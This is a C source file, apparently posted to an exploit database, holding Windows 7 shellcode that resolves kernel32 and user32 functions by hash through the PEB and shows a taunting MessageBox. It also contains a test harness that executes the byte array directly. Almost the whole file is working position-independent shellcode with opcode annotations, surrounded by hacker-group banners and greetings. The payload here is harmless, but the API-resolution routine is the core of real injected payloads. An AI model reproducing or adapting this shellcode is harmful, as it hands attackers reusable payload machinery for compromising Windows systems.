/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : Shellcode - Local - Win32
# Type : Shellcode - proof of concept - Windows
# Tested on : Windows7
###
# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !
proof / test img : http://oi47.tinypic.com/2cs6g3n.jpg
*/
#include <stdio.h>
#include <string.h>
// Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes
char msg[] =
"\xD9\xEB" // FLDPI
"\x9B" // WAIT
"\xD9\x74\x24\xF4" // FSTENV %ESP
// ----------
"\x31\xD2" // XOR %EDX,%EDX
"\xB2\x77" // MOV %DL, 0x77
"\x31\xC9" // XOR %ECX,%ECX
"\x64\x8B\x71\x30" // MOV %ESI,DWORD 0x30
"\x8B\x76\x0C" // MOV %ESI,DWORD %ESI
"\x8B\x76\x1C" // MOV %ESI,DWORD %ESI 0x1C
"\x8B\x46\x08" // MOV %EAX,DWORD %ESI 0x08
"\x8B\x7E\x20" // MOV %EDI,DWORD %ESI 0x20
"\x8B\x36" // MOV %ESI,DWORD %ESI
"\x38\x4F\x18" // CMP BYTE %EDI 0x18,%CL
"\x75\xF3" // JNZ SHORT .me
"\x59" // POP %ECX
"\x01\xD1" // ADD %ECX,%EDX
"\xFF\xE1" // JMP %ECX
"\x60" // PUSHAD
"\x8B\x6C\x24\x24" // MOV %EBP,DWORD %ESP 0x24
"\x8B\x45\x3C" // MOV %EAX,DWORD %EBP 0x3C
"\x8B\x54\x28\x78" // MOV %EDX,DWORD %EAX %EBP 0x78
"\x01\xEA" // ADD %EDX,%EBP
"\x8B\x4A\x18" // MOV %ECX,DWORD %EDX 0x18
"\x8B\x5A\x20" // MOV %EBX,DWORD %EDX 0x20
"\x01\xEB" // ADD %EBX,%EBP
"\xE3\x34" // JECXZ SHORT .me
"\x49" // DEC %ECX
"\x8B\x34\x8B" // MOV %ESI,DWORD %EBX %ECX
"\x01\xEE" // ADD %ESI,%EBP
"\x31\xFF" // XOR %EDI,%EDI
"\x31\xC0" // XOR %EAX,%EAX
"\xFC" // CLD
"\xAC" // LODS BYTE %ESI
"\x84\xC0" // TEST %AL,%AL
"\x74\x07" // JE SHORT .me
"\xC1\xCF\x0D" // ROR %EDI, 0x0D
"\x01\xC7" // ADD %EDI,%EAX
"\xEB\xF4" // JMP SHORT .me
"\x3B\x7C\x24\x28" // CMP %EDI,DWORD %ESP 0x28
"\x75\xE1" // JNZ SHORT .me
"\x8B\x5A\x24" // MOV %EBX,DWORD %EDX 0x24
"\x01\xEB" // ADD %EBX,%EBP
"\x66\x8B\x0C\x4B" // MOV %EBX %ECX
"\x8B\x5A\x1C" // MOV %EBX,DWORD %EDX 0x1C
"\x01\xEB" // ADD %EBX,%EBP
"\x8B\x04\x8B" // MOV %EAX,DWORD %EBX %ECX
"\x01\xE8" // ADD %EAX,%EBP
"\x89\x44\x24\x1C" // MOV DWORD %ESP 0x1C,%EAX
"\x61" // POPAD
"\xC3" // RETN
/* Free GAZzA! */
"\xB2\x08" // MOV %DL,0x08
"\x29\xD4" // SUB %ESP,%EDX
"\x89\xE5" // MOV %EBP,%ESP
"\x89\xC2" // MOV %EDX,%EAX
"\x68\x8E\x4E\x0E\xEC" // PUSH 0xEC0E4E8E
"\x52" // PUSH %EDX
"\xE8\x9F\xFF\xFF\xFF" // CALL .me
"\x89\x45\x04" // MOV DWORD %EBP 0x04,%EAX
"\xBB\x7E\xD8\xE2\x73" // MOV %EBX,0x73E2D87E
"\x87\x1C\x24" // XCHG DWORD %ESP,%EBX
"\x52" // PUSH %EDX
"\xE8\x8E\xFF\xFF\xFF" // CALL .me
"\x89\x45\x08" // MOV DWORD %EBP 0x08,%EAX
"\x68\x6C\x6C\x20\x41" // PUSH 0x41206C6C
"\x68\x33\x32\x2E\x64" // PUSH 0x642E3233
"\x68\x75\x73\x65\x72" // PUSH 0x72657375
"\x88\x5C\x24\x0A" // MOV BYTE %ESP 0x0A,%BL
"\x89\xE6" // MOV %ESI,%ESP
"\x56" // PUSH %ESI
"\xFF\x55\x04" // CALL DWORD %EBP 0x04
"\x89\xC2" // MOV %EDX,%EAX
"\x50" // PUSH %EAX
"\xBB\xA8\xA2\x4D\xBC" // MOV %EBX,0xBC4DA2A8
"\x87\x1C\x24" // XCHG DWORD %ESP,%EBX
"\x52" // PUSH %EDX
"\xE8\x61\xFF\xFF\xFF" // CALL .me
// ----------
/* Message Title */
"\x68\x49\x2E\x50\x58" // PUSH 0x58502E49
"\x68\x21\x20\x52\x2E" // PUSH 0x2E522021
"\x68\x20\x59\x6F\x75" // PUSH 0x756F5920
"\x68\x46\x75\x63\x6B" // PUSH 0x6B637546
// ----------
"\x31\xDB" // XOR %EBX,%EBX
"\x88\x5C\x24\x0F" // MOV BYTE %ESP 0x0F,%BL
"\x89\xE3" // MOV %EBX,%ESP
// ----------
/* Message Content */
"\x68\x2D\x44\x7A\x58" // PUSH 0x587A442D
"\x68\x64\x41\x6E\x73" // PUSH 0x736E4164
"\x68\x79\x20\x4B\x65" // PUSH 0x654B2079
"\x68\x65\x64\x20\x42" // PUSH 0x42206465
"\x68\x48\x61\x43\x6B" // PUSH 0x6B436148
// ----------
"\x31\xC9" // XOR %ECX,%ECX
"\x88" // MOV BYTE
"\x4C" // DEC %ESP
"\x24\x13" // AND %AL,0x13
"\x89\xE1" // MOV %ECX,%ESP
"\x31\xD2" // XOR %EDX,%EDX
"\x52" // PUSH %EDX
"\x53" // PUSH %EBX
"\x51" // PUSH %ECX
"\x52" // PUSH %EDX
"\xFF\xD0" // CALL %EAX
"\x31\xC0" // XOR %EAX,%EAX
"\x50" // PUSH %EAX
"\xFF\x55\x08"; // CALL DWORD %EBP 0x08
int main()
{
int (*dz)() = (int(*)())msg;
printf("bytes: %u\n", strlen(msg));
dz();
}
/*
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================*/
